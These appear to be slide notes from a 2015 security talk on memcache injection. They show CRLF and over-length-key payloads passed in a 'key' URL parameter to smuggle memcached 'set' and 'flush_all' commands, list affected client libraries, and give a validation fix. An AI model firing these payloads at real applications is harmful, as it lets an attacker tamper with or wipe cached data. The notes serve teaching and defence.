Memcache Injection (Hacktrick'15)
- 6. > set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END
#! telnet 127.0.0.1 11211
- 10. ?key=omer 0 10 6 \r\n hacked \r\n
urlencode(‘\r’) = %0d
urlencode(‘\n’) = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
#! phpstorm memcached.php
- 12. ?key=aaaaa…(251) (251 = key length, one byte over memcached's 250-byte key limit)
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251)
flush_all %0d%0a
#! phpstorm memcached.php
- 15. > get key_omer
< VALUE key_omer 0 6
< 123456
< END
#! phpstorm memcached.php
- 17. > get aaa (251)
< ERROR
< get omer
< VALUE omer 0 6
< 353535
< END
#! phpstorm memcached.php
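- 18. Python : Python-pylibmc
Php : Memcached
Asp.Net : memcacheddotnetproject (1.1.5)
Java : com.meetup.memcached
(Libraries listed as affected at the time of this 2015 talk. Whatever client is used, the application should reject keys containing CR, LF, spaces or other control characters, or longer than 250 bytes, before they reach the memcached client.)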
#! cat vulnerable_libraries